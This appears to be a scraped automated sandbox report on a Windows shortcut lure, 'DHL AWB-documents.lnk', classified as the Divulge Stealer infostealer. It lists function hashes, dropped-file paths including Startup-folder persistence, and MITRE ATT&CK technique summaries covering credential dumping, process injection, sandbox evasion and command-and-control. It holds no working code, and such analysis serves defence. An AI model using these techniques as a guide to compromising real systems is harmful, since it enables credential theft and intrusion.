Function 00007FFD348D6534 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f9af5530148c1cb0647ba1c9b8cdb5278e5ef9dc71c1998729fa2dff7d12076
Instruction ID: 52eb020e4990e420c844b5e030dd0780703dfb7d90b909fc2a8e22f455ca5777
Opcode Fuzzy Hash: 0f9af5530148c1cb0647ba1c9b8cdb5278e5ef9dc71c1998729fa2dff7d12076
Instruction Fuzzy Hash: 1DC02B01B1D81E07B450770C3CA10B89381F7C5130B100773E20EC12CECC0C6C9121C1

Function 00007FFD348D6524 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b9a300984e7c239953d255076b524aacbd8bd2301146ebbc48d9de57d8d1300
Instruction ID: 9bde314cf54e8cbb5cceba8bac07fcccabc85207567b22194c758f860aa64095
Opcode Fuzzy Hash: 9b9a300984e7c239953d255076b524aacbd8bd2301146ebbc48d9de57d8d1300
Instruction Fuzzy Hash: F6C09B11B1D91D07B550675C7CA11B89381E7C5530B641777D60DC12DDCC1D6CD121C5

Function 00007FFD348D6544 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e2f89e28101275cfaa659b6f625efa0ae2acf9bef60f1624b18578949e8061b
Instruction ID: 04db7dbc671470b0e00514832e6c14f70b21e7ff51f3b8f1b3c5b062dd7ccebc
Opcode Fuzzy Hash: 8e2f89e28101275cfaa659b6f625efa0ae2acf9bef60f1624b18578949e8061b
Instruction Fuzzy Hash: FFC09B11B1D91D07B550775C7CA11B89381E7C5530B545777E60DC12DECC1D6CD521C1

Function 00007FFD348D3E3F Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7b9a184c37de38c318d2c984e134f780034008493ae6bf16de7389ec4b885b
Instruction ID: 7cd6fa8976c7a6dbbb197b44a155b84a417626a2922571ce23cc290786d096e3
Opcode Fuzzy Hash: 9d7b9a184c37de38c318d2c984e134f780034008493ae6bf16de7389ec4b885b
Instruction Fuzzy Hash: C7C02B33B4EA090BEFD0C90CF450AA333C0CBD1650F24067BA068C11C5D80ED1CB9242

Function 00007FFD348D26D0 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e36598808e982306c9c9c3dd9f3334666eeda28a7fd2748d9ffe93458a9d5507
Instruction ID: eff1618ce5b8b6e1f0a4a8ec17385555d9b31c3a8e287c1dc75a6fe8d49e1b2d
Opcode Fuzzy Hash: e36598808e982306c9c9c3dd9f3334666eeda28a7fd2748d9ffe93458a9d5507
Instruction Fuzzy Hash: 03D02342F0F6C507DF41432C54F40513B90AE53210B0401F6F544C504FEC1C5806D351

Function 00007FFD348C090A Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83086965c730425346ea92ee239d92a999b7084b9c9b34c25b3695596e349c43
Instruction ID: dbeb2e2e7349206ead541ba0edc799e3a6a9e18e56135b83da7057fd278dc433
Opcode Fuzzy Hash: 83086965c730425346ea92ee239d92a999b7084b9c9b34c25b3695596e349c43
Instruction Fuzzy Hash: AAC0123355C6094AC711A794E4618DFF360EF952A9F440B3AE04A910A6DD5967C58681

Function 00007FFD348D8A28 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 190ff9d7042a32d5920568a40b259a9eae1c500066552e562f7ceab3da787fdc
Instruction ID: 46b136cd45b5a46f0861f018273821e9ed773fb19bf8c3d0746e3bc6caf68bb8
Opcode Fuzzy Hash: 190ff9d7042a32d5920568a40b259a9eae1c500066552e562f7ceab3da787fdc
Instruction Fuzzy Hash: E9D01247B1D06221E22172FD31330E90F288F0633470C5533D1CD650837C6974C54189

Function 00007FFD348D66FA Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c32b22e6ff379195bbb71c8f1e1cb0c9e7ef403377eed5342a532ddc67222b2
Instruction ID: 3028869192f32ad10f61e00ff65415b01f19148ce3e4b6c3724dc52066bf5004
Opcode Fuzzy Hash: 7c32b22e6ff379195bbb71c8f1e1cb0c9e7ef403377eed5342a532ddc67222b2
Instruction Fuzzy Hash: EEC0805291F70B05EB90DB087091BA557C0D791390F900676A01EC0196DC0D90865185

Function 00007FFD348C3EE3 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97df1a4386d0e434315b6abdc144547dbf90b895c7545c57a0a71bb4493b3ae5
Instruction ID: d662ba5d560050eb39810c0b9f387508b7bba7c4627b21e71a0ac1fcbad3b3f0
Opcode Fuzzy Hash: 97df1a4386d0e434315b6abdc144547dbf90b895c7545c57a0a71bb4493b3ae5
Instruction Fuzzy Hash: D8C0123352C54A57D341A700E4518EBB350FF90200F801B3AF44A860D5ED5CA7448582

Function 00007FFD348CD703 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9f1b96a6d992b37bb6364a301e156e56ad86d715981a59da4de791f5abeb921
Instruction ID: 19df1f8064587ffbb8557c88ebb0aa9ff0f1d6fe8a7498ec3d9589618c16bacf
Opcode Fuzzy Hash: e9f1b96a6d992b37bb6364a301e156e56ad86d715981a59da4de791f5abeb921
Instruction Fuzzy Hash: 2FC0803252C60947D381E750E491CEFF351FFD1710FC01B3AF04B810D5DD5966458581

Function 00007FFD348D6830 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7d39d5561f9e61a34c3413f7c4d24fa8bdabc11d98dde49753795ed245dee28
Instruction ID: 94450ad3fe80a99cdd0454eb5a0132bf04251bc9f80ea57d3136c2e0ca5c062b
Opcode Fuzzy Hash: d7d39d5561f9e61a34c3413f7c4d24fa8bdabc11d98dde49753795ed245dee28
Instruction Fuzzy Hash: DCC09221B19C2C1A16A8E22D1999A7A14D6CBDE621B1942ABA50CD369DDC584C0693E1

Function 00007FFD348DC3CA Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2999935baf1403da79965cb0253ff58eba2e42ac90f2b9be08a96e933c55ad2
Instruction ID: 36bedbee860f77507f23d22b2f9b10898a0f4d210ef921a657f2e537d563f7cb
Opcode Fuzzy Hash: f2999935baf1403da79965cb0253ff58eba2e42ac90f2b9be08a96e933c55ad2
Instruction Fuzzy Hash: 14C08053D5A60F05EEA4870C70915E567C1E791250F900577E015C019ADC1DE4879141

Function 00007FFD348CF460 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e461b7e40ce3d0a39d3802579fded866cfac05037b9cd262a922f841f575070
Instruction ID: c676c927faf724ee38502143f6b5246b5cdbc399b454b9714ceacb9c32200088
Opcode Fuzzy Hash: 8e461b7e40ce3d0a39d3802579fded866cfac05037b9cd262a922f841f575070
Instruction Fuzzy Hash:

Function 00007FFD348CF498 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9e069f499749e3623bd40067dffd70bb4409851a45e325f4a67e05aedcd0847
Instruction ID: 58e186429f276b7023f32be07e96aa2965b4a5dba1dfbc770c4eca5e87825f98
Opcode Fuzzy Hash: e9e069f499749e3623bd40067dffd70bb4409851a45e325f4a67e05aedcd0847
Instruction Fuzzy Hash:

Function 00007FFD348D9400 Relevance: .0, Instructions: 1COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2886526523.00007FFD348C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd348c0000_setup_x86.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7923f4196a5087aea8e09b9bdbb8626ce984d60b37176fe54be3ad7aecd95327
Instruction ID: 4148f779f46a34d3151d225a01a8ae0d0c1054c2bcd374f845912ababfa3aac2
Opcode Fuzzy Hash: 7923f4196a5087aea8e09b9bdbb8626ce984d60b37176fe54be3ad7aecd95327
Instruction Fuzzy Hash:

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report DHL AWB-documents.lnk

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Divulge Stealer

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\8mzJ3.scr

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\setup_x86.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\4QwS6TE4dKTLldI

C:\Users\user\AppData\Local\Temp\GWb46Z7cSlJX4lz

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_04mxujz5.pie.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ulx5rev.mi4.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4yhkhcyn.jky.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5g4jcszt.bnw.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crvctiny.kez.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5ibsnrt.15e.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eorlu3tw.ytk.psm1

Windows Analysis Report
DHL AWB-documents.lnk

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre